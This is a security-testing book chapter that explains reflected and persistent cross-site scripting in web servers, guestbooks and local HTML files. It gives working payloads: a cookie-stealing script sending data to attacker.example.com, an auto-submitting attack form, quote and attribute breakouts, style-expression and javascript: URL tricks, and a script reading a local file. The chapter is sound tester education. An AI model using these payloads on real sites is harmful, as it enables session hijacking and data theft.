Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Chapter 10. HTML Scripting Attacks

In this chapter:
Understanding Reflected Cross-Site Scripting Attacks Against Servers
Understanding Persistent XSS Attacks Against Servers
Identifying Attackable Data for Reflected and Persistent XSS Attacks
Common Ways Programmers Try to Stop Attacks
Understanding Reflected XSS Attacks Against Local Files
Understanding Script Injection Attacks in the My Computer Zone
Ways Programmers Try to Prevent HTML Scripting Attacks
Understanding How Internet Explorer Mitigates XSS Attacks Against Local Files
Identifying HTML Scripting Vulnerabilities
Finding HTML Scripting Bugs Through Code Review
Summary

HTML isn’t used just on the Web: it is used for e-mail, Help files, and the graphical user interface (UI) of server and client applications. HTML is being used in places you might not realize. For example, in Microsoft Windows, HTML is used to supply users with help about the operating system (see Figure 10-1). Today’s HTML rendering engines are very rich with functionality that supports running scripts, plug-ins, applets, and much more. This rich functionality gives developers capabilities to make their programs display data nicely. On the other hand, it also assists attackers (and you as a tester) in exploiting that same code.

Just as HTML usage isn’t restricted to the Web, HTML scripting attacks aren’t either. Although this type of attack is very common against Web applications, client applications that don’t render HTML can be vulnerable, too. HTML scripting attacks against both the client and server come in two forms—reflected cross-site scripting and persisted cross-site scripting (also known as script injection). The goal in cross-site scripting attacks is to get HTML script (JavaScript, Microsoft Visual Basic Script, etc.) to be returned as output by the application in a place that attackers could not normally author script. In this chapter, you’ll learn the importance of cross-site scripting bugs, how to find these bugs, how these can be exploited, how programmers commonly fix these issues, and common bugs associated with these fixes.

Figure 10-1. HTML output in the Microsoft Windows Help and Support Center user interface

Understanding Reflected Cross-Site Scripting Attacks Against Servers

HTML script that is returned to a Web browser from a server is usually placed on the server by someone who has the ability to author HTML pages on the server, such as the site’s Webmaster. Cross-site scripting (XSS) attacks occur when an attacker returns HTML script from the server without having Webmaster-level permissions on the server. In fact, the attacker doesn’t modify anything on the server. The attack happens when server-side code takes user-supplied input and echoes the data back to the user in a way that allows the data to run as HTML script on the client machine. The script is unknowingly supplied by the user (or victim, in this case). The following search engine example can help clarify how this is possible.

Tip

Cross-site scripting was originally abbreviated as CSS, but this acronym caused much confusion because it is also used for Cascading Style Sheets. Cross-site scripting is now commonly abbreviated as XSS.

Example: Reflected XSS in a Search Engine

A search capability is a common feature on Web sites where the user types in a word or phrase to search for and a list of results is returned. However, when a search term(s) cannot be found, an error message is returned to the user, as shown in Figure 10-2.

Figure 10-2. Error message returned on a Web site when a search term could not be found

By looking at the page’s URL, http://server/search.aspx?keyword=monkey, you might suppose that the data typed in the URL is returned in the resulting Web page. You can test this theory by modifying the URL a little. When you try the URL http://server/seach.aspx?keyword=SomeBogusText, for example, you see that the data in the URL, the value of the query string parameter “keyword,” is returned in the Web page. To better understand how this page works view the HTML source. The following HTML source was returned by search.aspx:

<HTML>
<HEAD><TITLE>Search Example</TITLE>
<META http-equiv="content-type" content="text/html; charset=utf-8">
</HEAD>
<BODY>
 <H1>Search Results</H1>
 for SomeBogusText
 <BR>
 <BR>
 <h2>Sorry, no results were found.</h2>
<BR>
<FORM name=search>
<INPUT type=text name="keyword" value="SomeBogusText">
<INPUT type=submit value="Go">
</FORM>
</BODY>
</HTML>

Notice that the data supplied in the query string is placed in the <body> section of the HTML. The <body> section can contain HTML tags. What is an interesting test case? How about an HTML tag in the query string such as the bold tag (<B>)? You can test this case by browsing to a URL like http://server/search.aspx?keyword=<B>Boldly</B> %20go%20where%20no%20dev%20expected. The Web server returns the following HTML and displays the word Boldly from the input in bold text:

<HTML>
<HEAD><TITLE>Search Example</TITLE>
<META http-equiv="content-type" content="text/html; charset=utf-8">
</HEAD>
<BODY>
 <H1>Search Results</H1>
 for <B>Boldly</B> go where no dev expected
 <BR>
 <BR>
 <h2>Sorry, no results were found.</h2>
<BR>
<FORM name=search>
<INPUT type=text name="keyword" value="&lt;B&gt;Boldly&lt;/B&gt; go where no dev expected">
<INPUT type=submit value="Go">
</FORM>
</BODY>
</HTML>

OK, that was a little amusing, but formatting text as bold type isn’t a security issue. The test case proves, however, that HTML can be echoed through the Web server and that the browser will render the echoed data as HTML. Running script is more interesting, as you’ll see in a moment. Trying to echo a <script> tag through the server can be tested by using a URL like http://server/search.aspx?keyword=<SCRIPT>alert(“Running!”)</SCRIPT>. When this URL is loaded, the server returns the input in exactly the same fashion as it did in the previous examples, which results in the following HTML. This also causes a dialog box to appear in the Web browser (shown in Figure 10-3). The dialog box is displayed through the following script:

<HTML>
<HEAD><TITLE>Search Example</TITLE>
<META http-equiv="content-type" content="text/html; charset=utf-8">
</HEAD>
<BODY>
 <H1>Search Results</H1>
 for <SCRIPT>alert("Running!")</SCRIPT>
 <BR>
 <BR>
 <h2>Sorry, no results were found.</h2>
<BR>
<FORM name=search>
<INPUT type=text name="keyword"
value="&lt;SCRIPT&gt;alert(&quot;Running!&quot;)&lt;/SCRIPT&gt;">
<INPUT type=submit value="Go">
</FORM>
</BODY>
</HTML>

Now script can be run by echoing it through the Web server’s buggy search functionality. The following section discusses why this is important and how echoing script is different from when attackers host script from their own site.

Figure 10-3. An alert displayed on a Web site when a script is included in the query string

Understanding Why XSS Attacks Are a Security Concern

The problem is that a browser sees a script that is echoed through the Web server as originating from the Web site to which the browser sent the request. Web browsers and other Web clients have a security model that allows only the Web site that issued certain data to the client to retrieve that data from the client. For example, if www.woodgrovebank.com issues a cookie to a client browser, woodgrovebank.com can read that cookie, but microsoft.com cannot. Suppose that www.woodgrovebank.com hosts the buggy search functionality discussed earlier. If script is echoed through http://www.woodgrovebank.com/search.aspx, and the script attempts to access the cookie, the echoed script would be successful at accessing the cookie issued by www.woodgrovebank.com; this occurs because the echoed script appears to the client browser as having originated from www.woodgrovebank.com.

XSS enables actions that are normally prohibited

Generally, any security check in an application that is performed on the basis of allowing only code originating from a certain domain can be abused by an XSS bug. Following are some examples:

Cookie access. Normally, a cookie cannot be read or set from a domain other than the one in which it originates. However, an XSS bug in another domain can allow access to a cookie associated with that particular domain. Please note, the HTTPOnly cookie property can prevent script from accessing a cookie as discussed in Chapter 4, and provides a little protection against obtaining cookie information through an XSS bug.
Object model access. The Web browser allows a Web page to be accessed by HTML script through the Document Object Model (DOM). Accessing the DOM allows the contents of the page to be modified on the fly. It also allows HTML script to automate the Web page. For example, through the DOM, HTML script can trigger the onclick event for a button on the Web page, which causes the same sequence of actions to occur as if the user clicked the button. Can you see some danger here? For example, users wouldn’t want a malicious site to be able to access the contents of their Web mail mailbox and click the Send or Delete button for them. Generally, for this reason, only pages with the same fully qualified domain name on the Internet or same host name on an intranet can access each other’s DOM.
Tip
Access to a Web page’s DOM can also enable an attacker to rewrite the page’s content to create convincing spoofed content. The spoofed Web page would appear to originate from the legitimate Web site.
UserData access. UserData is a Microsoft Internet Explorer feature that allows a Web page to retain data between visits. It operates very much like cookies and also has a similar security model. The data is accessible only by the same directory and with the same protocol used to persist that data. Although at first you might think that to access the data an attacker would need to find an XSS bug in the same directory as the page that stores the userData, but that isn’t necessary. The trick is that a page can access any other page on the same site through the DOM as described earlier. An attacker could load the page that set the userData and then rewrite the HTML contents of the page through the DOM. The rewritten HTML can access the userData. Because the userData is then accessed by the page that created it, it is able to read the information successfully. More information on the userData behavior in Internet Explorer can be found at http://msdn.microsoft.com/workshop/author/behaviors/reference/behaviors/userdata.asp.
Bypassing SiteLock restrictions. SiteLock and similar protections are discussed in more detail in Chapter 18. Basically, some ActiveX controls can be called only by trusted domains. An XSS bug enables an attacker to place code into the trusted domain and then to call the control, rendering the SiteLock protection useless. What fun!
Zone elevation. An XSS bug can allow an attacker to have more privileges than originally intended. For example, Internet Explorer includes a Trusted Sites security zone. As you might guess, only sites the user trusts should be placed in this zone because sites in this zone run with fewer security restrictions than do those in most other security zones. If there is an XSS bug in a site in the Trusted Sites zone, injected script runs with the privileges of a trusted site. More information about Internet Explorer zones is provided in the sidebar titled Internet Explorer zones later in this chapter.

Note

HTTP splitting is a type of vulnerability that is exploited in a similar way to cross-site scripting and has similar outcomes. For more information about this type of attack, see http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf.

Exploiting Server-Reflected XSS Bugs

An attacker’s goal is to run attacker-supplied script that appears to come from a legitimate origin on a victim’s machine. The victim’s machine will interpret the script as originating from the Web server with the XSS bug. In the earlier Web search example, the script is contained in the URL of the page containing the XSS bug. If an attacker can trick a user into visiting a specially crafted link, the user (victim) will send the attacker-supplied script in the query string to the server containing the XSS bug, and that script will run in the victim’s browser—appearing to originate from the Web server hosting the buggy search functionality. At first it might seem like it would be hard for an attacker to coerce a user into visiting a link that contains suspicious text (like the <script> tag), but it is usually easier than you think. For example, an attacker could use a phishing attack (discussed in Chapter 6) and send a user an e-mail that includes a link to an appealing Web site, or host a page indexed by search engines like Google. Suppose the attacker’s page contains photographs of a famous celebrity that many people would search for. When a user views the page, the user is automatically redirected to the malicious URL that contains the script. There are lots of ways an attacker can lure victims to malicious sites. Think maliciously like an attacker and you will quickly come up with a few convincing scenarios.

Next, the attacker must consider what script to run on the victim’s machine. Attackers want to take advantage of the fact that the victim’s browser will see their script as originating from the vulnerable but trusted Web server rather than from the e-mail message or the Web site containing the link with the attacker-supplied script. Cookies are a good target if the vulnerable server uses them for authentication purposes or stores sensitive information in them. If a cookie is used for authentication, it might not contain the user’s password, but it could contain a session ID or similar value that the server uses to authenticate the user. In other words, attackers might not need a password. In this case, an attacker can simply access the Web site by replaying the value of the cookie copied from the victim’s machine. Replaying a cookie’s value can enable an attacker to log on to the victim’s bank account, Web-based e-mail account, and other privileged areas. The cookie can be read through script by checking the value of the document.cookie property. A quick script to send the value of the victim’s cookie to a Web server of choice is as follows:

<SCRIPT>document.location="http://attacker.example.com/
default.aspx?"+escape(document.cookie);"</SCRIPT>

To get a victim to echo this script through the buggy search functionality, for example, an attacker must convince the victim to navigate to http://server/search.aspx?keyword=<SCRIPT>document.location=“http://attacker.example.com/default.aspx?”%2Bescape(document.cookie);“</SCRIPT>. The script first causes the victim to send the attacker’s data (script) to the buggy Web server. That script causes the victim’s Web browser to visit http://attacker.example.com/default.aspx with a query string of the escaped value of the cookie from the site that contains the buggy search functionality. The attacker then is able to look in the Web server log to see the value of the victim’s cookie. The steps of this attack are illustrated in Figure 10-4.

Figure 10-4. An XSS bug could be exploited to copy a victim’s cookie to another Web site

Tip

Secure Socket Layers (SSL) provides no mitigation against XSS attacks. When a Web browser uses SSL, the data sent over the wire is encrypted. Because XSS attacks happen on the client’s machine, the data has already been decrypted. The attacker, through the XSS vulnerability, can access the decrypted data.

POSTs Are Exploitable, Too

Just as script is sent as part of the URL in the earlier example (using a GET request), script can be sent as part of POST data to Web applications that accept POST requests. The following example illustrates how POST requests can be problematic.

Example: Exploiting POST Data in helloPostDemo.asp

In this example, a form is displayed asking the user to enter the user’s first name. After the user enters the information and clicks the Submit button, the Web page displays the message: “Hello, <name>. Nice to meet you.” The HTML returned is as follows:

<html><head><title>Hello Post Demo</title>
<META http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body>
Hello, name. Nice to meet you.
</body>
</html>

Tip

For more information about the differences between GET and POST HTTP requests, see Chapter 4.

This example is almost identical to the search example. Because getting script returned by the Web application is the goal, a good test case is to use <SCRIPT>alert(‘Hi!’)</SCRIPT> as the name, which will successfully run script. But how can an attacker get a victim to send script as the user’s name? POST data isn’t part of the URL. When you are testing, you can enter script in the original form and submit it, but an attacker can’t readily get a victim to insert script instead of a first name. (An attacker might be able through social engineering to trick some users into doing this, but many times it won’t work.) It would be much better if the attacker could devise a way to force the browser to submit the script data automatically without any further action on the part of the victim.

Getting Victims to Submit Malicious POST Data

Attackers can trick victims into sending the script data in the POST data by hosting the form that asks for the user’s name on the attacker’s Web site. Instead of asking victims to type in their names, the attacker can prepopulate the Name field with script that exploits the XSS vulnerability.

Tip

In addition to exploiting XSS, the ability to coerce a victim to POST arbitrary data can lead to cross-site request forgery attacks; see Chapter 19, for more information.

Creating a Test to Exploit This Vulnerability

An easy way for you to host the form when you are testing is to save the HTML form to your Web site. To get the form to send its data to the buggy server, the form’s action must point to the full URL on the original Web site’s action URL. In the example, this requires adding the Action property and setting it to be the URL where the vulnerable copy of helloPostDemo.asp lives. Once the Action property is added, the <form> tag should look something like <form method=“POST” name=“myForm” action=“http://VulnerableWebSite/helloPostDemo.asp”>. Also, prepopulate the form with script by changing the <input> tag so that it is <input type=“text” name=“myName” value=“<SCRIPT>alert(‘Hi!’)</SCRIPT>”>. Now if a user visits your copy of the form on your Web site and clicks Submit, the user will send script to the vulnerable Web application (helloPostDemo.asp) and your script will run in the user’s browser.

It still might be difficult to get some users to click the Submit button. Attackers want to get as many people as possible to echo their script from their custom forms like the one you created. By using script on the hosted form page, the form submission process can be automated. The Submit method on the form object can be called to submit the form without any user interaction. Once this script is added to your hosted version of the form, the HTML looks like the following:

<body>
<html><head><title>Hello Post Demo</title></head>
<body>
 <form method="POST" name="myForm" action="http://VulnerableWebSite/helloPostDemo.asp">
 Name: <input type="text" name="myName"
 value="&lt;SCRIPT&gt;alert('Hi!')&lt;/SCRIPT&gt;"> <input type="submit" value="Submit">
 </form>
<SCRIPT>myForm.submit();</SCRIPT>
 </body>
 </html>

Immediately after this hosted version of the form is loaded, the victim echoes script through the vulnerable Web site.

The examples discussed so far are very simple. In some cases, it can be a little more difficult for attackers to get script executed, and these complex examples are discussed later in this chapter. However, we give an introduction to persisted XSS attacks, which are very similar to reflected XSS attacks, before getting into more complicated examples.

Understanding Persistent XSS Attacks Against Servers

In reflected XSS attacks, the attacker’s data (script) is not stored on the server; it is merely echoed by a request that contains the attacker-supplied script. Persistent XSS, sometimes called script injection, is almost identical in functionality to reflected XSS attacks except that the attacker-supplied script is stored on the server. Instead of coercing the victim into making a request that contains the malicious form data (script), the attacker can make the request that contains the script. Then, the attacker simply needs to get the victim to visit a URL that will display the script that is stored on the server.

Example: Persistent XSS in a Web Guestbook

In this section, we discuss an example of a persistent XSS attack in a Web guestbook, which is a feature that is potentially susceptible to script injection attacks. Use your browser to load the guestbook sample (guestBook-Display.asp) included on the book’s companion Web site. A Web guestbook usually accepts a user’s name, e-mail address, and any message the user wants to add to the guestbook. This information is stored on the server, usually in a database or file. When someone views the guestbook, the information that is stored on the server is returned to the user on a Web page. This is precisely how the sample guestbook file works, including functionality that allows the user to view everyone’s submissions to the guestbook, as shown in Figure 10-5.

Figure 10-5. Entries included in the guestbook

Note

Use the sample guestbook to experiment with viewing submissions to the guestbook. The files you need are guestbook-AddEntry.asp, guestbook-AddEntry.html, guestbook-Display.asp, and guestbookEntries.html.

Examine the HTML returned when you view the guestbook. The text that is entered in a new guestbook entry is included. Are you getting any ideas for interesting test cases for a guestbook entry? Try to put the <script> tag as the guestbook entry comment by making it <SCRIPT>alert(‘Hi!’)</SCRIPT>. After you submit the entry, check whether the script was injected successfully by viewing the Guestbook Entries page again. You should see an alert dialog box that contains “Hi!” (See Figure 10-6.) This means that arbitrary script can be injected.

Figure 10-6. Script injected into a guestbook entry

Exploiting Persistent XSS Against Servers

Because the injected script is actually stored on the server, attackers don’t need victims to echo attacker-supplied script through the Web server. Attackers can send the script, store it on the server, and simply let the victim view it from there. Although reflected XSS is definitely a big problem, most security-minded potential victims will not visit the malicious Web site or click links that contain suspicious-looking data. On the other hand, persistent XSS enables attackers to exploit many victims without any effort by luring users to visit a Web site that contains the script injection vulnerability. In the guestbook example, the script runs any time a user views the guestbook. Surely the guestbook owner and other curious users will want to see the guestbook entries, and in the process they will run the attacker-supplied script. If attackers want to target specific users, they can use the same techniques they use for reflected XSS attacks, such as a link to a page that contains a script injection bug or a Web page that redirects the user.

Identifying Attackable Data for Reflected and Persistent XSS Attacks

In a reflected XSS attack, the attacker’s script is only echoed from the victim’s browser through the vulnerable site and back to the victim’s browser. Attackers need to identify places where they can coerce victims into sending specific data (script) to the vulnerable Web site. In persistent XSS (script injection) attacks, attackers can send the data to the vulnerable Web site themselves. Persistent XSS enables attackers to send malicious data in data fields the server might look at, but attackers can’t coerce victims into sending data to the server. Table 10-1 describes several common data fields that are read by Web servers and whether the field can be used in a reflected and/or persistent XSS attack.

Table 10-1. Common Data Fields Used in XSS Attacks

Data field	Reflected	Persistent	Reason
URL/query string	✓	✓	An attacker can store data in the URL/query string and have the victim send it to the Web server by enticing the user into visiting a link. Attackers can send the script in the URL in persistent XSS themselves.
POST data	✓	✓	For reflected XSS, attackers can host their own form and force the victim to post the form data (script). For persistent XSS, attackers can simply submit the form themselves.
User-Agent	×	✓	The User-Agent header and other HTTP headers won’t work for reflected XSS unless an attacker is able to set them on the victim’s machine. Web browsers don’t allow a Web page to set the User-Agent string, so an attacker isn’t able to set it for the victim. Windows application programming interfaces (APIs) can be called to make HTTP requests with an arbitrary User-Agent string, but to do this the ability to run a binary on the victim’s machine is required. If attackers can do this, they have already compromised the victim’s account through some other means. For persistent XSS, the User-Agent can work for attackers because they can make custom requests to get the data stored on the server.
Referer	✓	✓	The Referer field yields mixed results. If the Web application being tested echoes text such as “Return to http://server/page.htm” where server/page.htm is the server and page that the user was previously visiting, it might be attackable. The Referer field might seem difficult to attack because often characters such as angle brackets that are illegal characters in server and filenames are required. However, it might be possible to get script to run by using characters that are allowed in a filename, appending a query string that contains script data, or using angle brackets in the server name that uses wildcard Domain Name System (DNS) (discussed in Chapter 6); it’s worth trying. For persistent XSS, attackers can use the Referer field because they can make custom requests using a malformed Referer.

Tip

Don’t test using the user interface. So far, the examples shown are straightforward and don’t modify the data entered into the text input controls. However, some pages might perform some client-side validation of the data typed in. This validation can block the form from being submitted through the UI. Other times, client-side script can modify the values typed into the UI before submitting the form. For example, the programmer might have client-side script to remove all characters except letters in the Name field in the helloPostDemo.asp example. If you test through the UI, you might be misled into believing that script could not be echoed through the target server when it can be. For more information about how to bypass the user interface when testing, please see Chapter 4.

Sometimes More Than the <script> Tag Is Needed

In all of the examples discussed so far, the data sent to the server is just the <script> tag. Sometimes a little more work is necessary to get script running, as the example HelloPostDemoWithEmail.asp demonstrates. The form asks for the user’s name and e-mail address. Attempting to echo the <script> tag for the name as done in earlier examples (<SCRIPT>alert(‘Hi!’)</SCRIPT>) while supplying an e-mail address isn’t successful. The data is returned to the browser in the HTML, but it is HTML encoded. Instead of the data <SCRIPT>alert(‘Hi!’)</SCRIPT> being echoed, <SCRIPT>alert(‘hi’)</SCRIPT> is echoed. The browser won’t treat this as the <script> tag, so script doesn’t run.

What happens if the e-mail address field is left blank, but a name is specified? After the data is submitted, the form is displayed again, but the Name field is prepopulated with the value originally submitted with the form. By performing the test case of submitting only one field, you can echo data through the form by leaving the Email field blank. However, attempting to submit script as in previous examples still doesn’t run script. The HTML source returned to the Web browser is the following:

<html><head><title>Hello Post Demo</title>
<META http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body>
 <form method="POST" name="myForm">
 Name: <input type="text" name="myName" value="<SCRIPT>alert('hi')</SCRIPT>"><br>
 Email: <input type="text" name="myEmail" value=""><br>
 <input type="submit" value="Submit">
 </form>
</body>
</html>

The data isn’t HTML encoded, but why didn’t the script run? The script is being used as the value of the <input> tag’s Value property. To run script the input data must be viewed as an HTML tag. To get the data to be viewed as script, the input must include a closing set of quotation marks and close the <input> tag. Do this by starting the data with “> and following it with the <script> tag. The resulting URL will look like this: http://localhost/HelloPostDemoWithEmail.asp?myName=”><SCRIPT>alert(‘Hi!’)</SCRIPT>&myEmail=. This successfully runs script.

Tip

Don’t forget to test to see how error cases are handled. Many form applications notice when not all required fields are sent to the server on an incompletely filled-out form. The server will then display the form again, but this time with the previously sent values already populated in the form. This allows an additional code path to test for XSS.

Common Ways Programmers Try to Stop Attacks

The most common way programmers attempt to stop attacks is to encode the HTML of an attacker’s input before returning it to the Web browser. HTML encoding replaces characters used to create HTML tags, such as angle brackets, with other characters that are not interpreted as special HTML characters. The replacement characters do not affect the way text is displayed in the Web browser—they only stop the HTML rendering engine from recognizing data as HTML tags. So, when <SCRIPT>alert(“hi”)</SCRIPT> is HTML encoded, it is returned as <SCRIPT>alert("hi")</SCRIPT>. (Table 10-2 lists several characters that are HTML encoded.) This approach to stopping XSS attacks often works. However, this approach won’t always stop all XSS attacks.

Table 10-2. HTML Encoding for Input Characters

Original character	Character after HTML encoding
<	<
>	>
&	&
”	"

Developers can significantly limit XSS attacks by HTML-encoding all of the user-supplied data because then attackers often cannot get their data to be returned from the server as HTML. This technique of encoding is good for security reasons, but many programs want to allow users to use HTML. For example, some Web-based programs such as Web logs and Web-based e-mail systems offer users the opportunity to richly format their entries by using HTML tags; however, these applications don’t want to allow users to run script. Attempting to block script while allowing use of other HTML tags is very difficult, and there many ways to run script without using the <script> tag.

HTML-Encoded Data Doesn’t Always Stop the Attack

Often, programmers can decrease the capability of running script when they HTML-encode untrusted data. However, this method won’t stop script in all cases. Following are a few situations when script can run even if the attacker’s data is HTML-encoded by the programmer.

Stuck in a Script Block

Sometimes the attacker’s data ends up inside the <script> tag. This usually happens when the data passed in is being set as the value for a script variable. For example, look at this code:

<SCRIPT>
 SomeCode...
 var strEmailAdd = 'attacker data';
 MoreCode...
</SCRIPT>

In this example, attackers don’t need to send a <script> tag—their data is already inside a script block. All an attacker needs to do is close the quotation marks in which the variable’s value is set. In this example, the programmer of the script chose to use single quotation marks to enclose the value of the string. Single quotation marks aren’t modified when the data is HTML encoded. To run script, an attacker could send ‘; alert(‘Hi!’); // as the data. The script returned to the browser then would look like this:

<SCRIPT>
 SomeCode...
 var strEmailAdd = ''; alert('Hi!'), //';
 MoreCode...
</SCRIPT>

Notice that the input closes the value of the string variable strEmailAdd with the first character (single quotation mark); then, it uses the statement delimiter (semicolon) and is followed by arbitrary code. The data is ended with two forward slashes to comment out the rest of the line. Because the input data is always followed by the closing quotation mark and a semicolon (’;) in the output HTML, the attacker wants to comment that out. The attacker doesn’t want a syntax error in the script that would prevent the exploit from running.

Using Events

In HTML, attributes of a tag can be enclosed in single quotation marks, double quotation marks, or no quotation marks at all (see Figure 10-7). If untrusted data is returned as the attribute of a tag and the data is HTML encoded, an attacker cannot break out of the attribute if the attribute is enclosed in double quotation marks (double quotation marks are converted to "). However, if the HTML author didn’t enclose the attribute’s value in double quotation marks and is HTML-encoding the user’s data, the untrusted data will be confined to the tag, but not the attribute.

Figure 10-7. Attributes enclosed in single quotation marks, double quotation marks, and no quotation marks

The more knowledge you have (or an attacker has) about HTML, the more effective you will be at finding ways to run script when certain constraints are imposed. For example, most tags have events. When a tag’s event occurs, the user-defined script associated with that event runs. In the <input> tag example in Figure 10-7, there are many possible events. One of the events is the onclick event. If the untrusted data is returned in the HTML where the untrusted data is HTML encoded, as follows, script can still run:

<INPUT name="txtInput2" type="text" value='unTrustedData'>

If OurData’ onclick=alert(‘Hi’) junk=’ is sent as the untrusted data, the following HTML will be returned:

<INPUT name="txtInput2" type="text" value=' OurData' onclick=alert('Hi') junk=''>

When the user clicks the text box, the onclick event will fire and script will run. Usually, there are many different events for each HTML tag. When you exploit a condition similar to this, it is wise to consult an HTML reference. Sometimes programmers attempt to filter suspicious-looking data, which might make events not commonly used more important to test. By using less common events, an attacker hopes that the programmer doesn’t know about an event and so it is therefore unfiltered.

Using Styles

HTML Styles also allow script to be run. Legitimate script in styles is a feature that isn’t commonly used, but you should think like an attacker when testing—attackers will use anything to attack. HTML Styles are normally used for formatting the page display. For example, the font used in a text box can be specified to be Wingdings by using HTML styles, as shown in Figure 10-8.

Figure 10-8. Using the Style property of the <input> tag to change the font to Wingdings

Expressions in styles can be used to run arbitrary script. For example, <INPUT name=“txtInput1” type=“text” value=“SomeValue” style=“font-family:expression(alert(‘Hi!’))”> will run script. It isn’t common to be stuck in a style attribute, but if you are, it could be a way to run script. Styles are more useful in places where the programmer knows to block events but doesn’t know about styles.

Scripting Protocols

In some situations, untrusted data is HTML-encoded and is returned as the value of the src property of an IMG tag. For example, look at this code:

<IMG src= "untrusted data">

Normally, the data that would be sent is the filename of a graphics file, for example, smiley.gif, or a full URL such as http://www.example.com/monkey.gif. Sending a URL for a picture won’t run script. However, most browsers support JavaScript URLs: the URL begins with javascript: and is followed by code. Often, JavaScript URLs are used in links when the author of the page wants to run some script on the page when the link is clicked. This JavaScript URL syntax can be used to an attacker’s advantage.

Almost everywhere a full URL in a Web page can be placed, a JavaScript URL will work. In the preceding example, javascript:alert(‘Hi!’) could be sent as the untrusted data instead of a graphics filename, and a script would run on the page. Angle brackets aren’t even needed! The javascript: protocol is the most widely used scripting protocol and should work in most browsers. However, many browsers recognize some additional scripting protocols. For example, older versions of Netscape also support mocha: and livescript:. Internet Explorer currently supports vbscript: in addition to javascript:.

Important

To help protect users, Internet Explorer 7 doesn’t support scripting protocols as the src property of an image tag.

Understanding Reflected XSS Attacks Against Local Files

On most systems, the operating system and applications install thousands of HTML files on the local hard disk, in addition to the temporary files used by the Web browser. The files are mostly used for product help and templates used to dynamically create UI inside an application. When people think of HTML files on the local hard disk, they mostly think of files with the .htm or .html extension. HTML files are also located inside of other files. Windows binary files can contain HTML resources; this resource type allows HTML files to be stored inside the binary. Another place HTML files are located is inside Compiled Help Module (CHM) files, which have the .chm extension and are usually used for Help content.

These three types of files (.htm/.html files, HTML resources, and CHM files) can contain XSS bugs. In the reflected XSS examples discussed so far, the server has echoed attacker input in the HTML returned to the client. This is most commonly done by sever-side scripting languages such as Perl, Active Server Pages (ASP), or PHP: Hypertext Preprocessor (PHP). Because local files are not run through a server-side script interpreter how can a local HTML file contain a reflected XSS bug? The HTML file can contain script that rewrites its own contents and can echo user-supplied data.

Data sent to local HTML files will generally be sent through the URL. Forms using the POST method send the form variables at the end of an HTTP packet. Because viewing HTML files on the local hard disk doesn’t use HTTP, posting data to these files won’t be very useful in testing. Data sent to local HTML files is usually sent by appending a question mark or hash mark (#) to the local HTML file’s filename followed by the data. Here’s an example to clarify.

Example: Local HTML File Reflected XSS

Load localHello.html (which you can find on the companion Web site) in your Web browser. After you enter the filename, insert the hash mark (#) followed by your name. As shown in Figure 10-9, your name will be visible in the local HTML file.

Figure 10-9. The local HTML file echoing the data supplied following the hash mark

View the source of localHello.html. When you examine the source of the document, you see that the name entered after the hash mark isn’t present. What’s going on? Somehow the HTML contained the name because it is displayed it in the browser. This requires a closer look at the page’s source (see Figure 10-10). The script in the page contains a variable named strName. This variable is set with the value of the browser’s hash (location.hash), excluding the first character in location.hash. (The first character is always the hash mark, and the programmer of the page didn’t want to echo that character.) Later in the script, the new contents are written to the HTML displayed (through the DOM) using the document.write method. In this case, “Hello, Tom” was written. The browser displays the modified HTML content allowing you to see “Hello, Tom” in the browser window.

Figure 10-10. HTML source, which doesn’t contain the user-supplied data in the local XSS exploit

With an understanding of the source code of this file, you know the untrusted data isn’t encoded or filtered. Anything placed in the URL after the hash mark is echoed. The programmer likely didn’t realize reflected XSS is possible through files on the local hard disk. Try sending in <SCRIPT>alert(‘Hi!’)</SCRIPT> as the data following the hash mark. Bingo! Script runs.

Exploiting Reflected XSS Bugs in Local Files

Before we discuss why XSS bugs in local files are an issue, you must understand the first steps in exploiting these issues. In XSS bugs in Web servers, the attacker coerces the victim into navigating to a URL that contains the XSS bug. The attacker knows the full URL to the buggy page (example: http://server/buggy.aspx). Everyone can access the page at the same URL. This is good for attackers because they will always know where to point the victim. Much like an XSS bug on a Web server, to exploit an XSS bug in a local file attackers must point the victim to the URL of the buggy file. Unfortunately for attackers, the URL containing the XSS bug varies from system to system; for example, on one attacker’s machine it might be C:SomeCoolProgramuggy.html, but on another attacker’s machine it might be something different such as D:SomeCoolProgramuggy.html. The directory names might also be different. How can attackers deal with this? First, most users accept the default installation directory for a program. If a program suggests SomeCoolProgram as the install directory, most users will install to that directory. Also, most people install programs to the C drive. Information disclosure bugs, discussed in Chapter 7, might be used in combination with local XSS bugs to help attackers determine where buggy files live on a victim’s hard disk.

Understanding Why Local XSS Bugs Are an Issue

Although there probably aren’t cookies or user data issued for the local file system, an attacker can still cause harm by exploiting a local XSS bug—often more harm than attackers can cause with an XSS bug in a Web application. Local XSS bugs enable an attacker’s code to run in the My Computer zone, which has the most lax security settings, which is why attackers are quite happy when they discover a local XSS issue. Less security means more fun for attackers.

Remember that an XSS bug can access the DOM of all other pages for the same site. (If you missed it, this information is in the sidebar titled XSS enables actions that are normally prohibited earlier in this chapter.) In the My Computer zone, there isn’t the notion of domain or site. All of the My Computer zone is treated as the same entity, which means that any page in the My Computer zone can access any other page in this zone through the DOM (file system permissions still apply). Once in the My Computer zone, attackers can read other files on the local hard disk. Attackers need to know the path of a file they want to look into, but often this isn’t a huge issue. Suppose there is a file on the victim’s machine named C:SercetPlans.txt, which contains secret plans. The following script grabs the contents of C:SecretPlans.txt and displays it in a dialog box:

<SCRIPT>
  var x=window.open('file://c:/SecretPlans.txt','myWindow'),
  while (x.document.readyState !='complete') ;
  var strSecretText=x.document.body.innerText;
  x.close();
  alert(strSecretText);
</SCRIPT>

If someone with permissions to C:SecretPlans.txt loads the preceding script, that script will have access to read the file. In the example of exploiting XSS bugs on servers, the contents of the victim’s cookie were copied by appending the cookie’s value to a URL pointing to the attacker’s Web server. The same approach can be used to exploit local XSS bugs, too. However, there are two problems with appending the victim’s data to a URL: first, because this is using the GET method the data size is limited to the amount of data that can be contained in the URL. The second problem is that if the victim happens to look in the browser history, the data would look extremely suspicious sitting in the address of a Web page on the attacker’s server. Attackers would rather make victims’ lives simple and not complicate them with such worries. An alternative to sending the data in the URL is to send it through an HTML form using an HTTP POST. Sending the data in this way is not limited to local XSS exploits; it can also be used in server XSS exploits, and in script injection exploits against local files (persistent XSS against local files).

